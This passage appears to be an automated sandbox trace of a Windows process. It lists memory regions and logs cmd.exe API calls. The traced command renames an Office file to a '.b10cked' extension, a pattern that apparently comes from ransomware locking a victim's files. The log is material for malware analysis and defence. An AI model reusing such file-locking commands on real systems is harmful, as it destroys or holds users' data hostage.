region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24167 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 24168 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24169 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 24170 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 24171 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 412 os_tid = 0xe60 [0175.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20faf4 | out: lpSystemTimeAsFileTime=0x20faf4*(dwLowDateTime=0x9e5ffb00, dwHighDateTime=0x1d440a9)) [0175.279] GetCurrentProcessId () returned 0xd7c [0175.279] GetCurrentThreadId () returned 0xe60 [0175.279] GetTickCount () returned 0x32f2a [0175.279] QueryPerformanceCounter (in: lpPerformanceCount=0x20faec | out: lpPerformanceCount=0x20faec*=23206827698) returned 1 [0175.280] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0175.280] __set_app_type (_Type=0x1) [0175.280] __p__fmode () returned 0x76b331f4 [0175.280] __p__commode () returned 0x76b331fc [0175.280] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0175.280] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0175.280] GetCurrentThreadId () returned 0xe60 [0175.280] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe60) returned 0x38 [0175.280] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.280] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0175.280] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0175.280] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fa84 | out: phkResult=0x20fa84*=0x0) returned 0x2 [0175.280] VirtualQuery (in: lpAddress=0x20fabb, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.280] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0175.280] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0175.281] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0175.281] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fa54, dwLength=0x1c | out: lpBuffer=0x20fa54*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0175.281] GetConsoleOutputCP () returned 0x1b5 [0175.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.281] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0175.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0175.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.281] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0175.281] _get_osfhandle (_FileHandle=1) returned 0x7 [0175.281] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0175.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.281] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0175.281] _get_osfhandle (_FileHandle=0) returned 0x3 [0175.281] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0175.282] GetEnvironmentStringsW () returned 0x300210* [0175.282] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0175.282] GetEnvironmentStringsW () returned 0x300210* [0175.282] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0175.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e9f4 | out: phkResult=0x20e9f4*=0x40) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0xa0, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x0, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegCloseKey (hKey=0x40) returned 0x0 [0175.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e9f4 | out: phkResult=0x20e9f4*=0x40) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x40, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x1, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.282] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x0, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.283] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x9, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.283] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x4, lpData=0x20ea00*=0x9, lpcbData=0x20e9f8*=0x4) returned 0x0 [0175.283] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e9fc, lpData=0x20ea00, lpcbData=0x20e9f8*=0x1000 | out: lpType=0x20e9fc*=0x0, lpData=0x20ea00*=0x9, lpcbData=0x20e9f8*=0x1000) returned 0x2 [0175.283] RegCloseKey (hKey=0x40) returned 0x0 [0175.283] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638b [0175.283] srand (_Seed=0x5b88638b) [0175.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"" [0175.283] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"" [0175.283] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0175.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0175.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0175.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.283] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0175.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0175.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0175.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0175.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0175.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0175.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0175.283] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0175.284] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0175.284] GetEnvironmentStringsW () returned 0x302360* [0175.284] FreeEnvironmentStringsW (penv=0x302360) returned 1 [0175.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0175.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0175.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0175.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0175.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0175.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0175.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0175.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0175.284] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0175.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f7c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f7c0, lpFilePart=0x20f7bc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f7bc*="Desktop") returned 0x18 [0175.284] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f53c | out: lpFindFileData=0x20f53c) returned 0x3009f0 [0175.284] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0175.284] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f53c | out: lpFindFileData=0x20f53c) returned 0x3009f0 [0175.285] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0175.285] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f53c | out: lpFindFileData=0x20f53c) returned 0x3009f0 [0175.285] FindClose (in: hFindFile=0x3009f0 | out: hFindFile=0x3009f0) returned 1 [0175.285] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0175.285] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0175.285] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0175.285] GetEnvironmentStringsW () returned 0x300210* [0175.285] FreeEnvironmentStringsW (penv=0x300210) returned 1 [0175.285] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.285] GetConsoleOutputCP () returned 0x1b5 [0175.286] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0175.286] GetUserDefaultLCID () returned 0x409 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f900, cchData=128 | out: lpLCData="0") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f900, cchData=128 | out: lpLCData="0") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f900, cchData=128 | out: lpLCData="1") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0175.286] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0175.287] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0175.287] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.288] GetConsoleTitleW (in: lpConsoleTitle=0x2f0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.288] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0175.288] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0175.288] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0175.288] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0175.289] _wcsicmp (_String1="move", _String2=")") returned 68 [0175.289] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0175.289] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0175.289] _wcsicmp (_String1="IF", _String2="move") returned -4 [0175.289] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0175.289] _wcsicmp (_String1="REM", _String2="move") returned 5 [0175.289] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0175.293] GetConsoleTitleW (in: lpConsoleTitle=0x20f5f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.293] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0175.293] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0175.293] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0175.293] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0175.293] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0175.293] _wcsicmp (_String1="move", _String2="CD") returned 10 [0175.293] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0175.293] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0175.293] _wcsicmp (_String1="move", _String2="REN") returned -5 [0175.293] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0175.293] _wcsicmp (_String1="move", _String2="SET") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0175.294] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0175.294] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0175.294] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0175.294] _wcsicmp (_String1="move", _String2="MD") returned 11 [0175.294] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0175.294] _wcsicmp (_String1="move", _String2="RD") returned -5 [0175.294] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0175.294] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0175.294] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0175.294] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0175.294] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0175.294] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0175.294] _wcsicmp (_String1="move", _String2="VER") returned -9 [0175.294] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0175.294] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0175.294] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0175.294] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0175.294] _wcsicmp (_String1="move", _String2="START") returned -6 [0175.294] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0175.294] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0175.294] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0175.295] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.295] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.295] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f3b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f3ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f3ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0175.296] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0175.297] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0175.297] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~2.trx")) returned 0x2020 [0175.297] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0175.297] SetErrorMode (uMode=0x0) returned 0x0 [0175.297] SetErrorMode (uMode=0x1) returned 0x0 [0175.297] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20ed3c, lpFilePart=0x20ed24 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", lpFilePart=0x20ed24*="WWINTL~2.TRX") returned 0x3c [0175.297] SetErrorMode (uMode=0x0) returned 0x1 [0175.297] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2=".") returned 73 [0175.297] _wcsicmp (_String1="WWINTL~2.TRX", _String2="..") returned 73 [0175.297] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl~2.trx")) returned 0x2020 [0175.298] SetErrorMode (uMode=0x0) returned 0x0 [0175.298] SetErrorMode (uMode=0x1) returned 0x0 [0175.298] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x20f1b8, lpFilePart=0x20ef50 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX", lpFilePart=0x20ef50*="WWINTL~2.TRX") returned 0x3c [0175.298] SetErrorMode (uMode=0x0) returned 0x1 [0175.298] SetErrorMode (uMode=0x0) returned 0x0 [0175.298] SetErrorMode (uMode=0x1) returned 0x0 [0175.298] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f3c0, lpFilePart=0x20ef50 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked", lpFilePart=0x20ef50*="WWINTL.REST.trx_dll.b10cked") returned 0x4b [0175.298] SetErrorMode (uMode=0x0) returned 0x1 [0175.298] SetLastError (dwErrCode=0x0) [0175.298] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\wwintl.rest.trx_dll.b10cked")) returned 0xffffffff [0175.298] GetLastError () returned 0x2 [0175.298] FindFirstFileExW (in: 